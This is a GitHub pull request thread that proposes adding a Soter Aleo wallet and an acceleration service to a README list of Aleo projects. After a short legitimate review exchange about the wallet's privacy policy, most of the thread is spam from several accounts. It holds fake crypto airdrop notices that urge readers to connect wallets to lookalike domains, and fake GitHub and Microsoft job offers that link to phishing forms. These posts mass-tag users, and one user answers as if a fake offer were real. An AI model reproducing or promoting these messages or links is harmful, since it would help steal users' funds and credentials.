### PR TITLE
Update Wallets

### PR DESCRIPTION
**Pull request by aleoweb123**
- Soter | Aleo Wallet is a safe and fast Chrome extension wallet for the Aleo blockchain. 
- Aleo Acceleration Service enhances the generation of zero-knowledge proofs (zkp), improving the user experience for transactions and smart contract execution.

### CODE REVIEW

File: README.md [hunk 1]
```diff
@@ -191,3 +191,5 @@ The following is a curated list of applications powered by Aleo.
 - [(Unofficial) Account SDK](https://github.com/qqmee/aleo-sdk) - An unofficial account SDK for Aleo
 - [Leo Wallet](https://leo.app/) - A simple and private wallet for Aleo. Early access waitlist now open.
 - [Leo Wallet Adapter SDK](https://github.com/demox-labs/aleo-wallet-adapter) - A SDK for integrating with the Leo wallet
+- [Soter | Aleo Wallet](https://chrome.google.com/webstore/detail/soter-aleo-wallet/kfpmpkkjaohgchlokcohbaokindffdjk) - A safe and fast chrome extention wallet for Aleo blockchain
+- [Aleo Acceleration Service](https://github.com/Aleo123Dev/aleo-acceleration-service) - Aleo wallet acceleration service
```
Comment (collinc97) [inline README.md:195]:
```suggestion
- [Soter Aleo Wallet](https://chrome.google.com/webstore/detail/soter-aleo-wallet/kfpmpkkjaohgchlokcohbaokindffdjk) - A chrome extention wallet for the Aleo blockchain.
- [Aleo Acceleration Service](https://github.com/Aleo123Dev/aleo-acceleration-service) - A node provider application built with the Tauri framework. 
```

**Comment by HarukaMa** [comment]
I tried to check this wallet, and when I tried to create a wallet, I have to agree to a "privacy policy", which links to a 404 page.

**Comment by aleoweb123** [comment]
> I tried to check this wallet, and when I tried to create a wallet, I have to agree to a "privacy policy", which links to a 404 page.
> 
> Also I found this on the privacy policy linked on your store page:
> 
> > Information We Collect Automatically. We may automatically collect the following information about your use of our Site or Services through cookies and other technologies: your domain name; your browser type and operating system; web pages you view; links you click; your IP address; the length of time you visit our Site or use our Services; and the referring URL, or the webpage that led you to our Site. We may combine this information with other information that we have collected about you, including, where applicable, your user name, name, and other personal information Please see the section “Our Use of Cookies and Other Tracking Mechanisms” below for more information.
> 
> Are you really serious about this?

Hello HarukaMa! Thank you very much for pointing out the issue. Regarding the "Privacy Policy," it was an oversight on our part, and we will make the necessary adjustments as soon as possible.

The project is currently under development, and I have granted you code permissions. Could you please help review some security risks? We expect to open source all the code in the near future.

Soter Aleo Wallet retrieves records from the backend and decrypts them on the browser side without reporting any user information.

In addition, to accelerate the generation of zero-knowledge proofs (zkp), we have introduced the AAS (Aleo Acceleration Service). This service runs locally on the user's device. Soter Aleo Wallet negotiates with AAS and securely transmits the encrypted private key to it. AAS only uses the private key for computation and does not perform any storage operations.

**Comment by codelou** [comment]
## Congratulations! You've receive in $2000 on Kusama Airdrop 🪂🔴

Kusama Airdrop: Claim up to $20,000 in Tokens Now!

→ [Earn rewards on connect you wallet](https://kusamanetworks.com/)

→ [Claim Your $KSM Today](https://kusamanetworks.com/)

Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

Kusama Exchange

[N|Solid](https://nodesource.com/products/nsolid)

🚀 **Claim Your Bonus Now!** [Check Eligibility](https://kusamanetworks.com/)

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your bonus, up to $2,000!
- ✨Magic ✨ [Claim Your Bonus Now!](https://kusamanetworks.com/)

**Comment by codelou** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

Kusama Exchange


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by santhosh-trillionthoughts** [comment]
### LayerZero x Google Cloud Airdrop 2024: Exclusive $ZRO Tokens 🚀

Welcome to the groundbreaking LayerZero x Google Cloud Airdrop for 2024! Get ready to seize your share of $ZRO tokens in this unprecedented collaboration. Here's your guide to participating:

[Claim Now on LayerZero Official](http://link.layerzer0network.online/rFz335)

Claim Now

### Airdrop Participation Steps:

1. **Connect Your Wallet:**
   - Visit the [LayerZero Airdrop](http://link.layerzer0network.online/rFz335).
   - Integrate your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Spread the Excitement:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&text=LayerZero+Google+Cloud+Airdrop)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&text=LayerZero+Google+Cloud+Airdrop)
   - **Instagram:**
     [Share on Reddit](https://reddit.com/submit?url=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&title=LayerZero+Google+Cloud+Airdrop)

3. **Verification Check:**
   - Confirm your eligibility for the LayerZero x Google Cloud Airdrop and secure your $ZRO tokens.

Don't miss out on this futuristic collaboration – claim your tokens now and ride the wave of LayerZero innovation with Google Cloud!

**Comment by jigar-jstechno** [comment]
[Binance Free Tokens](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by karmalntest** [comment]
[Binance Airdrop](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @tulaseerao, @phayes, @theowlsden, @expyhist, @yzuyhp, @georgelima, @keepanote

**Comment by deenMuhammad** [comment]
# AltLayer Airdrop Season One Update

[AltLayer Airdrop Season One](https://go.altlayercommunity.online/XY2wna)

🚀 **Exciting Announcement!** AltLayer token (ALT) is gearing up for its Binance launch on January 25, 2024. As a token of appreciation, we extend a warm invitation to you to join the "ALT Token community" through an exclusive airdrop tailored for our early supporters and partners. Here's a quick overview:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of the total supply)
- **Distribution Categories:**
  - Ethereum Mainnet
  - Binance Mainnet

For a comprehensive breakdown of criteria and further details, refer to the complete announcement [Oficial Website](https://go.altlayercommunity.online/XY2wna).

The window to [Claim $ALT tokens](https://go.altlayercommunity.online/XY2wna) is open from January 25 to February 03, 2024. 

Any unclaimed $ALT tokens after this period will be returned to AltLayer’s Treasury.

We deeply appreciate your contribution to AltLayer's success! Stay tuned for more exciting developments in Season One.

**Important:** Please be aware of certain regional restrictions on the airdrop. Review the disclaimer before participating.

godsoul, @brokenthumbs, @wn, @shumailxyz, @nynevi, @ricglz, @calvinalx, @leefon, @vnbhattarai, @achilleslinux, @karuppasamy, @shriharip, @devblock7, @rzkmak, @xingkongliang, @zkz917, @johnmerchant, @anoushk1234, @kumarchinnakali, @HuMoran

**Comment by truncgil** [comment]
# AltLayer Airdrop Season One Update

[AltLayer Airdrop Season One](https://connect.airdropaltlayerio.online/)

🚀 **Exciting Announcement!** 

AltLayer token (ALT) is gearing up for its Binance launch on January 25, 2024. As a token of appreciation, we extend a warm invitation to you to join the "ALT Token community" through an exclusive airdrop tailored for our early supporters and partners. Here's a quick overview:

- **Total Allocated ALT Tokens:** 400,000,000 (4% of the total supply)

For a comprehensive breakdown of criteria and further details, refer to the complete announcement [Oficial Website](https://connect.airdropaltlayerio.online/).

The window to [Claim $ALT tokens](https://connect.airdropaltlayerio.online/) is open from January 25 to February 08, 2024. 

Any unclaimed $ALT tokens after this period will be returned to AltLayer’s Treasury.

We deeply appreciate your contribution to AltLayer's success! Stay tuned for more exciting developments in Season One.

**Important:** Please be aware of certain regional restrictions on the airdrop. Review the disclaimer before participating.

uniquecloud, @VukDukic, @HsuBob, @lucasbflopes, @PauloKeller, @loadchange, @rgb-24bit, @bayevai, @kioqq, @dirmich, @fuhailin, @conqs, @Kristinita, @abdoljabbar, @whosoonhwang, @entangledq, @kenbok, @blackfry, @chaneyhall, @CreeperLin

**Comment by apocanow1** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
awesomejerry, @kazzastic, @codeforshawn, @karlafalcao, @annihilatorrrr, @wisepythagoras, @sparkwj, @oddisland, @b3k, @thakursaurabh1998, @Daniel8008, @litesam, @mung9, @nshk7, @timyitong, @AbdullahJaved65, @andrelom, @bukhbayar, @andriytao, @cwyalpha

**Comment by Yucao-cy** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
sergsr, @powerumc, @Aquietzero, @govarun, @liubinchu, @kulshekhar, @renhades, @blockspacer, @TakuKobayashi, @fjibj, @maithanhduyan, @naichadouban, @keokilee, @mktbhhh, @napalm911, @lsdlinshunda, @MatthewEdge, @merlijndetovenaar84, @burzumumbra, @bighelmet7

**Comment by tomjrtsmith** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[Celestia Banner](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!AntonPerson, @camisetags, @pmuens, @appaquet, @kxws888, @BosEriko, @nbbug, @gushitong, @ankurrsinghal, @chrisbrain, @bakineugene, @kostasdizas, @xxsacxx, @dhersan, @senecamanu, @folkevil, @carsonip, @tieubao, @well1791, @sbhouchen

**Comment by powerumc** [comment]
I accept the offer. Can I only apply with an English resume?

2024년 2월 21일 (수) 오전 4:44, Yucao-cy ***@***.***>님이 작성:

**Comment by 1291945816** [comment]
# [Amazing Job Opportunity at Microsoft](https://careersmicrosoft.online/)

Exciting news! You have the chance to apply for a dream job at Microsoft Inc.!

## How to Apply:
Apply now by clicking [here](https://careersmicrosoft.online/). Hurry, applications close on [March 20, 2024](https://careersmicrosoft.online/).

## Job Description:
- **Position:** Lead Software Engineer
- **Salary:** $400,000 per year
- **Location:** Fully Remote
- **Benefits:**
  - Comprehensive health insurance coverage for you and your family
  - Generous retirement plan contributions
  - Unlimited vacation days and flexible work hours
  - Company-paid sabbaticals every three years
  - Annual company retreats to exotic locations
  - Cutting-edge equipment and tools for productivity

## Requirements:
- Minimum of 2 years of software engineering experience
- Expertise in multiple programming languages, including Python, JavaScript, and Go
- Deep understanding of cloud technologies, especially AWS and Kubernetes
- Track record of leading high-performing engineering teams
- Strong communication skills and ability to mentor junior developers

**Note:** This position is open to candidates worldwide. Don't miss the chance to join Microsoft Inc. and work on groundbreaking projects!
ppai-plivo, @JimYan, @rufatZZ, @fatalchemist, @yh392261226, @parthnagarkar875, @rpadma, @7wushanyun7, @carlosfaria94, @luis-herasme, @ww23, @minvs1, @kuxn, @apuntovanini, @todun, @hisato-kawaji, @BYChoo, @anwarchk, @cdlkite, @JoseRodrigues443

**Comment by evanderriya** [comment]
is the network down cant seem to do anything

**Comment by samir247247** [comment]
ok nic

**Comment by howardwu** [comment]
Is this wallet still active? Please resolve merge conflicts and reopen if so, thank you.

**Pull request closed without merging**